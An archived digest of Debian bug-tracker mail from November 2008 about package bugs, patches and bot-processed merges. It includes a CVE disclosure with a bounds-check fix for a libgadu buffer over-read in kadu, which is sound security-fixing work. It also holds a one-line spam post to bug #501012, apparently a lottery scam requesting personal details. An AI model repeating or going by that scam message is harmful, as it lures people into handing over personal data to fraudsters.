Hi Dne Wed, 05 Nov 2008 16:26:28 +0100 Francesco <[EMAIL PROTECTED]> napsal(a): > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Michal Čihař ha scritto: > > [..] > > Okay, so in this case is not in soanata, but in some of underlaying > > packages. Most likely it is a python-central issue. Do you remember > > something from the traceback? If not I'm afraid that there is no way to > > solve this issue. Maybe it is duplicate of #489368? > > > > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=489368 > > > > Maybe it's the same bug, anyway I'm sorry for having wasted your time. The problem is that you did not provide enough details to debug or fix the bug. So I will assume it is duplicate of above bug as the symptoms look similar. -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature
Bug#503205: twitux: Will not connect to twitter.
On Fri, Oct 24, 2008 at 09:54:22AM +0100, Lawrence Woodman wrote: > Rodrigo, > Therefore I started twitux with: > $ strace -otwitux.strace twitux > > Then clicked on "Connect" from the "Twitter" menu. Left it for a few > seconds. Then clicked on "Quit". > > The strace output is attached. I think I have reproduced this: Are you using NetworkManager (gnome's default is yes)? If so, does *it* think the network is active? I think twitux is asking nm about the network status and silently failing to do *anything* if the answer from there is "off". -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: reassign 504573 to python-central, forcibly merging 489368 504573
Processing commands for [EMAIL PROTECTED]: > reassign 504573 python-central Bug#504573: sonata: Sonata fails to start after python upgrade. Bug reassigned from package `sonata' to `python-central'. > forcemerge 489368 504573 Bug#489368: python-gtk: ImportError: No module named cairo Bug#504573: sonata: Sonata fails to start after python upgrade. Forcibly Merged 489368 504573. > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504603: libbobcat1: shlibs file fails to reflect ABI additions
Package: libbobcat1 Version: 1.21.1-1 Severity: serious Justification: Policy 8.6 libbobcat1's shlibs file leads to unversioned dependencies on the library, which (as demonstrated in #504185) are not always sufficient given that it's evidently gained new symbols over time. There are various ways to fix this issue, depending on how much maintenance effort you wish to spend and to what extent (if at all) you care whether dependencies ultimately wind up tighter than strictly necessary. In this case, though, I would suggest simply adding -V to your call to dh_makeshlibs, such that packages built against libbobcat1 always depend on at least the upstream version against which they were built. Although that may be overkill in some instances, it has the advantages of requiring no further maintenance and ensuring that dependencies will always be sufficiently tight (assuming you never extend the ABI from one Debian revision of an upstream version to the next). -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/dash Versions of packages libbobcat1 depends on: ii libc6 2.7-16 GNU C Library: Shared libraries ii libgcc1 1:4.3.2-1 GCC support library libbobcat1 recommends no packages. libbobcat1 suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504447: Additionnal info
Eric Valette wrote: > I do explicitly want the 1.5.2 X server that is available in > experimental and I also would like that the experimental package play > nicely with other experimental packages There is no requirement that experimental packages play nicely with each other. There is not even a requirement that experimental packages play nicely at all. Sorry. Regards, -- ,''`. : :' : Chris Lamb `. `'` [EMAIL PROTECTED] `- signature.asc Description: PGP signature
Bug#504447: marked as done (xserver-xorg-video-nouveau: fails to install due to incompatibilities with current experimental X server)
Your message dated Wed, 5 Nov 2008 15:18:54 + with message-id <[EMAIL PROTECTED]> and subject line Re: Bug#504447: Additionnal info has caused the Debian Bug report #504447, regarding xserver-xorg-video-nouveau: fails to install due to incompatibilities with current experimental X server to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 504447: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504447 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: xserver-xorg-video-nouveau Version: 1:0.0.10~git+20081028+cea05e1-1 Severity: grave Justification: renders package unusable apt-get -t experimental -s install xserver-xorg-video-nouveau Reading package lists... Done Building dependency tree Reading state information... Done Some packages could not be installed. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. Since you only requested a single operation it is extremely likely that the package is simply not installable and a bug report against that package should be filed. The following information may help to resolve the situation: The following packages have unmet dependencies: xserver-xorg-video-nouveau: Depends: xserver-xorg-core (>= 2:1.4) but it is not going to be installed I think it is related to xserver-xorg-video-2 (provides in this package and conflicts in the other one) -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores; PREEMPT) Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages xserver-xorg-video-nouveau depends on: ii drm-modules 2.3.1+git+20081027+1d930fc-1 DRM rendering modules for Linux (k ii libc6 2.8+20080809-3 GNU C Library: Shared libraries ii xserver-xor 2:1.5.2-1Xorg X server - core server xserver-xorg-video-nouveau recommends no packages. xserver-xorg-video-nouveau suggests no packages. --- End Message --- --- Begin Message --- Eric Valette wrote: > I do explicitly want the 1.5.2 X server that is available in > experimental and I also would like that the experimental package play > nicely with other experimental packages There is no requirement that experimental packages play nicely with each other. There is not even a requirement that experimental packages play nicely at all. Sorry. Regards, -- ,''`. : :' : Chris Lamb `. `'` [EMAIL PROTECTED] `- signature.asc Description: PGP signature --- End Message ---
Processed: forcibly merging 496101 504536
Processing commands for [EMAIL PROTECTED]: > # Automatically generated email from bts, devscripts version 2.9.26 > forcemerge 496101 504536 Bug#496101: xserver-xorg-input-all: Logitech MX510: Grab failed (Bad file descriptor) Bug#504536: xserver-xorg: No input possible after log off on sparc Forcibly Merged 496101 504536. > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503713: Investigating Lenny release blocker bug: #503713
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
tags 503713 patch
thanks
José Luis Tallón wrote:
> I look forward to your suggestion and/or patch.
Time did not allow me to finish this yesterday, but I managed to finish
up testing the patch today.
I've attached my proposed patch:
It sources the /etc/default/bindgraph in debian/config if it exists and
uses the DNS_LOG value to set the selection in debconf before prompting.
It also uses a more strict expression to check if the
/etc/default/bindgraph needs to be modified.
mailgraph uses as similar approach, except that it uses all debconf
questions to generate /etc/default/mailgraph and sources it to set the
current values in debconf for all mailgraphs questions. This may be an
option too, this was my initial approach, but that patch deferred to
much from your package as it is now, so I chose this more limited
approach for now.
You probably also want to purge the settings from the debconf database
in debian/postrm with db_purge to start fresh after the package has been
purged.
Regards,
Bas
- --
GnuPG: 0x77A975AD
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkkRs6cACgkQRWRRA3epda2UOgCgibWgu6HzMqRyRXVYzJYEhAOw
u44An1oM/3bPEdqGRzcq/o/toPtOCw3a
=dL5g
-END PGP SIGNATURE-
diff -ruN ../bindgraph-0.2a.old/debian/changelog ../bindgraph-0.2a/debian/changelog
--- ../bindgraph-0.2a.old/debian/changelog 2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/changelog 2008-11-04 16:40:13.0 +0100
@@ -1,3 +1,12 @@
+bindgraph (0.2a-3.2) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Change maintainer scripts to preserve changes to /etc/default/bindgraph
+by using those settings (if available) in debconf before prompting.
+(Closes: 503713)
+
+ -- Sebastiaan Couwenberg <[EMAIL PROTECTED]> Tue, 04 Nov 2008 16:27:47 +0100
+
bindgraph (0.2a-3.1) unstable; urgency=low
* Non-maintainer upload.
diff -ruN ../bindgraph-0.2a.old/debian/config ../bindgraph-0.2a/debian/config
--- ../bindgraph-0.2a.old/debian/config 2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/config 2008-11-05 15:26:51.0 +0100
@@ -12,7 +12,14 @@
case "$1" in
configure|reconfigure)
-
+ if [ -f /etc/default/bindgraph ]; then
+ . /etc/default/bindgraph
+
+ if [ -n "$DNS_LOG" ]; then
+db_set bindgraph/logfile "$DNS_LOG"
+ fi
+ fi
+
db_input medium bindgraph/start_on_boot || true
db_go
diff -ruN ../bindgraph-0.2a.old/debian/postinst ../bindgraph-0.2a/debian/postinst
--- ../bindgraph-0.2a.old/debian/postinst 2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/postinst 2008-11-05 15:27:05.0 +0100
@@ -60,18 +60,19 @@
if [ ! -f $DEFAULTS ]; then
echo "DNS_LOG=$LOGFILE" > $DEFAULTS
echo "LOG_FORMAT=${log_ver}" >> $DEFAULTS
-
- elif [ -z "`grep $LOGFILE $DEFAULTS`" ]; then
+ fi
+
+ if [ -z "`egrep "^\s*DNS_LOG\s*=\s*$LOGFILE\s*$" $DEFAULTS`" ]; then
# update log file location
mv $DEFAULTS $DEFAULTS.tmp
- grep -v DNS_LOG $DEFAULTS.tmp > $DEFAULTS
+ egrep -v "^\s*DNS_LOG\s*=" $DEFAULTS.tmp > $DEFAULTS
echo "DNS_LOG=$LOGFILE" >> $DEFAULTS
rm -f $DEFAULTS.tmp
fi
if [ -n "$2" ]; then
# if we are upgrading, update config :-)
- if [ -z "`grep LOG_FORMAT ${DEFAULTS}`" ]; then
+ if [ -z "`egrep "^\s*LOG_FORMAT\s*=" ${DEFAULTS}`" ]; then
echo "LOG_FORMAT=${log_ver}" >> $DEFAULTS
fi
fi
Processed: Re: Bug#503713: Investigating Lenny release blocker bug: #503713
Processing commands for [EMAIL PROTECTED]: > tags 503713 patch Bug#503713: overwrittes manually modified /etc/default/bindgraph on upgrade There were no tags set. Bug#481103: on upgrade postinstall configuration replaces the modified /etc/default/bindgraph Tags added: patch > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504149: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink
tag 504149 pending thanks > I hope our fix is sufficient. The changesets r13788, r13807, r13809, > r13810 should check the permissions. These changesets should apply > to 1.6.6 and 2.0 as well. Thanks a lot Frank. I just put a unified patch into our SVN, a new upload will come pretty soon. Michael -- Michael Meskes Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org) Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [EMAIL PROTECTED] Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: Re: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink
Processing commands for [EMAIL PROTECTED]: > tag 504149 pending Bug#504149: virtualbox-ose: symlink vulnerability due to bad /tmp handling Tags were: security Tags added: pending > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504573: sonata: Sonata fails to start after python upgrade.
Dne Wed, 05 Nov 2008 13:42:31 +0100 Francesco <[EMAIL PROTECTED]> napsal(a): > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Michal Čihař ha scritto: > > Dne Wed, 05 Nov 2008 10:20:47 +0100 > > Francesco Apollonio <[EMAIL PROTECTED]> napsal(a): > > > >> Package: sonata > >> Version: 1.5.2-2 > >> Severity: grave > >> Justification: renders package unusable > >> > >> > >> after python upgrade to version 2.5 sonata fails to start. > > > > What means fail to start? What error do you get? > > > > I'm sorry but i don't have the stacktrace. so it was a problem with the > python libs: > ii python-cairo 1.4.12-1.1 Python bindings for the > Cairo vector graphic > ii python-mpd0.2.0-2Python MPD client library > infact after dpkg-reconfigure python-cairo and dpkg-reconfigure > python-mpd sonata works perfectly. Okay, so in this case is not in soanata, but in some of underlaying packages. Most likely it is a python-central issue. Do you remember something from the traceback? If not I'm afraid that there is no way to solve this issue. Maybe it is duplicate of #489368? http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=489368 -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature
Bug#504536:
Synaptics driver on my laptop also has the same bug. In this light, I suspect that X server input layer introduces some change which breaks input drivers. Can someone with more detailed knowledge of X investigate this problem? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504589: Download location at debian/copyright is out of date
Hello, On Wed, Nov 5, 2008 at 1:23 PM, Modestas Vainius <[EMAIL PROTECTED]> wrote: > According to Debian Policy 12.5 (a MUST hence serious severity): > > In addition, the copyright file must say where the upstream sources (if any) > were obtained. > > However, http://www.piware.de/projects/ stated in copyright does not contain > versions beyond 0.9.13. Since Google didn't return anything very obvious at > first, it took me a while to figure out current upstream sources are hosted > on Debian's Alioth/Git. Good point. What about looking at the debian/watch file ? After all, that's what it is for, isn't it ? Cheers, Vincent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504573: sonata: Sonata fails to start after python upgrade.
Dne Wed, 05 Nov 2008 10:20:47 +0100 Francesco Apollonio <[EMAIL PROTECTED]> napsal(a): > Package: sonata > Version: 1.5.2-2 > Severity: grave > Justification: renders package unusable > > > after python upgrade to version 2.5 sonata fails to start. What means fail to start? What error do you get? -- Michal Čihař | http://cihar.com | http://blog.cihar.com signature.asc Description: PGP signature
Bug#504502: btrfs is WiP
btrfs-source package descripttion states, and homepage[1] agrees: Btrfs is under heavy development, and is not suitable for any uses other than benchmarking and review. The Btrfs disk format is not yet finalized. This is not something we want to release in stable. Remove from lenny and keep bug open to not let it migrate? [1] http://btrfs.wiki.kernel.org/index.php/Main_Page -- "rm -rf" only sounds scary if you don't have backups -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504589: Download location at debian/copyright is out of date
Package: pmount Version: 0.9.18-1 Severity: serious Hello, According to Debian Policy 12.5 (a MUST hence serious severity): In addition, the copyright file must say where the upstream sources (if any) were obtained. However, http://www.piware.de/projects/ stated in copyright does not contain versions beyond 0.9.13. Since Google didn't return anything very obvious at first, it took me a while to figure out current upstream sources are hosted on Debian's Alioth/Git. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (101, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27-1-amd64 (SMP w/1 CPU core) Locale: LANG=lt_LT.UTF-8, LC_CTYPE=lt_LT.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages pmount depends on: ii libblkid1 1.41.3-1 block device id library ii libc6 2.7-16 GNU C Library: Shared libraries ii libdbus-1-3 1.2.1-4simple interprocess messaging syst ii libhal-storage1 0.5.11-6 Hardware Abstraction Layer - share ii libhal1 0.5.11-6 Hardware Abstraction Layer - share ii libsysfs2 2.1.0-5interface library to sysfs pmount recommends no packages. Versions of packages pmount suggests: ii cryptsetup2:1.0.6-6 configures encrypted block devices ii hal 0.5.11-6 Hardware Abstraction Layer -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage
On Tue, Nov 04, 2008 at 02:13:16PM -0600, Gunnar Wolf wrote: > Umh, IMHO it would be way cleaner and better to make this a new > package. After all, the release team are not robots, and I guess that > making this a clean solution will look much better in their eyes than > clumping (hiding even?) a full module inside this package. Agreed. ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in order to fix an RC bug in libtemplate-perl (this is a regression from the functionality in etch; the code is in the main libtemplate-perl package in etch). Please could you process this as a lenny-related priority? Many thanks. Dominic. -- Dominic Hargreaves | http://www.larted.org.uk/~dom/ PGP key 5178E2A5 from the.earth.li (keyserver,web,email) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage
On Wed, Nov 05, 2008 at 12:03:14PM +, Dominic Hargreaves wrote: > ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in > order to fix an RC bug in libtemplate-perl (this is a regression from > the functionality in etch; the code is in the main libtemplate-perl > package in etch). > > Please could you process this as a lenny-related priority? Further to this, attached is my proposed NMU diff once libtemplate-plugin-dbi-perl is available. Notice I've moved some other packages from Suggests to Recommend on the advice of http://lists.debian.org/debian-release/2008/07/msg00828.html -- Dominic Hargreaves | http://www.larted.org.uk/~dom/ PGP key 5178E2A5 from the.earth.li (keyserver,web,email) diff -u libtemplate-perl-2.19/debian/control libtemplate-perl-2.19/debian/control --- libtemplate-perl-2.19/debian/control +++ libtemplate-perl-2.19/debian/control @@ -11,7 +11,8 @@ Provides: templatetoolkit-perl Conflicts: libtemplate-stash-perl Replaces: libtemplate-stash-perl -Suggests: libtemplate-perl-doc, libtemplate-plugin-gd-perl, libtemplate-plugin-xml-perl +Suggests: libtemplate-perl-doc +Recommends: libtemplate-plugin-gd-perl, libtemplate-plugin-xml-perl, libtemplate-plugin-dbi-perl Description: template processing system written in perl The Template Toolkit is a fast, powerful, flexible, and easily extensible template processing system written in Perl. It is ideally diff -u libtemplate-perl-2.19/debian/changelog libtemplate-perl-2.19/debian/changelog --- libtemplate-perl-2.19/debian/changelog +++ libtemplate-perl-2.19/debian/changelog @@ -1,3 +1,14 @@ +libtemplate-perl (2.19-1.1lenny1.1) testing-proposed-updates; urgency=medium + + * Non-maintainer upload + * Urgency medium due to RC bug fix + * Add Recommends: libtemplate-plugin-dbi-perl, and move +libtemplate-plugin-xml-perl and libtemplate-plugin-gd-perl from +Suggests to Recommends, to smooth upgrades from etch to lenny. +Closes: #504373 + + -- Dominic Hargreaves <[EMAIL PROTECTED]> Wed, 05 Nov 2008 11:55:40 + + libtemplate-perl (2.19-1.1lenny1) testing-proposed-updates; urgency=low * Non-maintainer upload
Bug#501012: claims of £1,350.00
E-mail([EMAIL PROTECTED]) for the claims of £1,350.000 pounds in the Irish-Promo claims Requirement: Name, Occupation, Address, Tel: -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504200: Extra data point
On i386, it doesn't segfault if using the -Write_Phonemes option or the undocumented -Write_Klatt option, but does segfault when using -Write_Ulaw, so the error looks to be in the conversion from the klatt representation to ulaw. -- Neil Muller -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504429: marked as done (kadu: CVE-2008-4776 remote DoS)
Your message dated Wed, 05 Nov 2008 10:02:04 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504429: fixed in kadu 0.6.0.2-3
has caused the Debian Bug report #504429,
regarding kadu: CVE-2008-4776 remote DoS
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
504429: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504429
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kadu
Severity: grave
Tags: security patch
Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for kadu.
CVE-2008-4776[0]:
| libgadu before 1.8.2 allows remote servers to cause a denial of
| service (crash) via a contact description with a large length, which
| triggers a buffer over-read.
You seem to embeed libgadu and thus suffer from the same
problem. The patch for gadu which applies to the sources is
attached.
If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4776
http://security-tracker.debian.net/tracker/CVE-2008-4776
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -pruN libgadu-1.8.1/src/events.c libgadu-1.8.2/src/events.c
--- libgadu-1.8.1/src/events.c 2008-06-17 22:29:54.0 +0200
+++ libgadu-1.8.2/src/events.c 2008-10-24 00:24:04.0 +0200
@@ -1,4 +1,4 @@
-/* $Id: events.c 610 2008-05-31 22:18:03Z wojtekka $ */
+/* $Id: events.c 639 2008-10-23 22:24:01Z wojtekka $ */
/*
* (C) Copyright 2001-2006 Wojtek Kaniewski <[EMAIL PROTECTED]>
@@ -621,7 +621,7 @@ static int gg_watch_fd_connected(struct
if (GG_S_D(n->status)) {
unsigned char descr_len = *((char*) n + sizeof(struct gg_notify_reply77));
- if (descr_len < length) {
+ if (sizeof(struct gg_notify_reply77) + descr_len <= length) {
if (!(e->event.notify60[i].descr = malloc(descr_len + 1))) {
gg_debug_session(sess, GG_DEBUG_MISC, "// gg_watch_fd_connected() not enough memory for notify data\n");
goto fail;
@@ -744,7 +744,7 @@ static int gg_watch_fd_connected(struct
if (GG_S_D(n->status)) {
unsigned char descr_len = *((char*) n + sizeof(struct gg_notify_reply60));
- if (descr_len < length) {
+ if (sizeof(struct gg_notify_reply60) + descr_len <= length) {
if (!(e->event.notify60[i].descr = malloc(descr_len + 1))) {
gg_debug_session(sess, GG_DEBUG_MISC, "// gg_watch_fd_connected() not enough memory for notify data\n");
goto fail;
pgp6vU4rwEbPz.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: kadu
Source-Version: 0.6.0.2-3
We believe that the bug you reported is fixed in the latest version of
kadu, which is due to be installed in the Debian FTP archive:
kadu-common_0.6.0.2-3_all.deb
to pool/main/k/kadu/kadu-common_0.6.0.2-3_all.deb
kadu-dev_0.6.0.2-3_all.deb
to pool/main/k/kadu/kadu-dev_0.6.0.2-3_all.deb
kadu-external-modules_0.6.0.2-3_amd64.deb
to pool/main/k/kadu/kadu-external-modules_0.6.0.2-3_amd64.deb
kadu-gtk-modules_0.6.0.2-3_amd64.deb
to pool/main/k/kadu/kadu-gtk-modules_0.6.0.2-3_amd64.deb
kadu-kde-modules_0.6.0.2-3_amd64.deb
to pool/main/k/kadu/kadu-kde-modules_0.6.0.2-3_amd64.deb
kadu-themes_0.6.0.2-3_all.deb
to pool/main/k/kadu/kadu-themes_0.6.0.2-3_all.deb
kadu_0.6.0.2-3.diff.gz
to pool/main/k/kadu/kadu_0.6.0.2-3.diff.gz
kadu_0.6.0.2-3.dsc
to pool/main/k/kadu/kadu_0.6.0.2-3.dsc
kadu_0.6.0.2-3_amd64.deb
to pool/main/k/kadu/kadu_0.6.0.2-3_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Patryk Cisek <[EMAIL PROTECTED]> (supplier of updated kadu package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.8
Date: Tue, 04 Nov 2008 15:37:05 +0100
Source: kadu
Binary: kadu kadu-common kadu-dev kadu-external-modules kadu-gtk-modules
kadu-kde-modules kadu-themes
Architecture: source all amd64
Version: 0.6.0.2-3
Distribution: unstable
Urgency: high
Maintainer: Patryk Cisek <[EMAIL PROTECTED]>
Changed-By: Patryk Cisek <[EMAIL PROTECTED]>
Description:
kadu
Bug#504279: Wodering..
Hi ! After some discussion with upstream, it appears that the issue cannot be fixed for the version currently in testing. I'm now with two alternatives: * Ask for a removal of the package * Excplicitely mark jbidwatcher as "US only". What do users think about these two alternatives ? Romain -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503712: etch->lenny upgrade left the system in broken state
On Tue, Nov 04, 2008 at 10:03:54PM +0100, Jonas Smedegaard wrote: > I also only see three packages depending. I did not check all > architectures, however. And more importantly, I did not check > build-depends! Right, I didn't think of those, and the large number of them does complicate things. I'd expect them not to require the X11 driver, but that's just a guess and not even a particularly educated one. If this avenue is still worth looking at, an adequate semi-automatic check might be to verify that the corresponding packages do build without ghostscript-x, and that the resulting packages are similar enough to those in the archive. I agree it's very late in the release process for this. > Any hint on looking up reverse build-dependencies somehow? I use grep-dctrl for things like this. > > While it would certainly be good to fix this is a point release, we > > haven't required upgrading through point releases in the past AFAIK, > > and I think anyone would have a hard time pushing for that now. > > I believe we did so for Linux kernels for Sarge (due to 2.4.x -> 2.6.x > transition for many archs and problems switching from initrd-tools to > either initramfs-tools or yaird). > > And again in Etch we bumped both initramfs-tool and yaird in etchnhalf - > I haven't checked it out, but expect upgrade instructions to include > upgrading to etchnhalf before upgrading to Lenny. OK, if that is the case, I'd be OK with a fixed gs-common.prerm in a point release and a mention in the release notes that 'aptitude install gs-common' is a way out of the situation. > >> 3) Have aptitude (and, if possible, APT generally) include a hint > >> that gs-common should not be auto-removed by default, and add to > >> upgrade procedures to install newest aptitude before dist-upgrading. > > > > Hm, that's a novel idea. > > No, not really. Already exercised for Linux kernels: Have a look on a > Lenny/Sid at /etc/apt/apt.conf.d/01autoremove :-) Ah, thanks. I wasn't aware of this. I believe we already recommend upgrading aptitude first, so that would indeed help. > How about this approach, then: Consider this a corner case, lower to > some non-RC level and leave it hanging...? As long as at least some of the mitigations mentioned above do get implemented, I'm OK with this. Do the release folks have any opinion? -- Niko Tyni [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#490893: still reproducible?
Is this still reproducible with the fix for #448470 which should make portmap initscript more reliable? Cheers, -- Yves-Alexis -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504511: missing dependency on libaugeas0
Guido Günther <[EMAIL PROTECTED]> (04/11/2008): > Any plans to push this into lenny once the bug is fixed? Well: | [EMAIL PROTECTED]:~$ rmadison python-augeas | python-augeas |0.2.0-1 | unstable | source, all So… no? Mraw, KiBi. signature.asc Description: Digital signature
Bug#504483: iceweasel hangs when restoring bookmarks
Hi! After removing the package I was not really able to test iceweasel for hours but my first impression was that it is now much more stable, in fact no crashes so far. I told the story another admin and he said that there were several complains that this package may caused some of the problems in icewesael and was removed afterwards from lenny/sid. Maybe it is possible to add a conflict in teh package description o avoid future problems with older installations? I think I'm not the only one who have installed pango-graphite by accident or whatever, so to help these persons a conflict or a dummy pango-graphite package which removes the old "faulty" one will help. But thnx so far for your help and please close this bug! Cheers, Oliver -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#345780: marked as done (Very long lines with dots)
Your message dated Wed, 05 Nov 2008 09:32:56 + with message-id <[EMAIL PROTECTED]> and subject line Bug#345780: fixed in ssmtp 2.62-2.1 has caused the Debian Bug report #345780, regarding Very long lines with dots to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 345780: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345780 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package:ssmtp Version:2.61-2 Hi! ssmtp does have a problem with long input lines and dots. In standardise(), a single line is checked to not start with a dot. If it does, a leading dot is inserted. I guess this was to not quit the DATA transaction when talking to other MTAs. However, very long lines (larger than ssmtp's bufsize, with is 2k) are read in 2k blocks and *each* 2k block is checked against a leading dot. In my case (a bulid robot building binutils/gcc/glibc/uclibc sources), some lines are as long as 25k (eg. linking of all libc files) and these contain dots. Unfortunately, one dot is on a 2k+1 boundary and thus, ssmtp dies in standardise(). It would be nice if buffer handling could either be done in a more dynamic way, or by just reading one byte less than buffer's size. (This would allow for adding a dot, though it would break the email's contents, thing GnuPG). Thanks, Jan-Benedict Glaw -- Jan-Benedict Glaw [EMAIL PROTECTED]. +49-172-7608481 _ O _ "Eine Freie Meinung in einem Freien Kopf| Gegen Zensur | Gegen Krieg _ _ O für einen Freien Staat voll Freier Bürger" | im Internet! | im Irak! O O O ret = do_actions((curr | FREE_SPEECH) & ~(NEW_COPYRIGHT_LAW | DRM | TCPA)); signature.asc Description: Digital signature --- End Message --- --- Begin Message --- Source: ssmtp Source-Version: 2.62-2.1 We believe that the bug you reported is fixed in the latest version of ssmtp, which is due to be installed in the Debian FTP 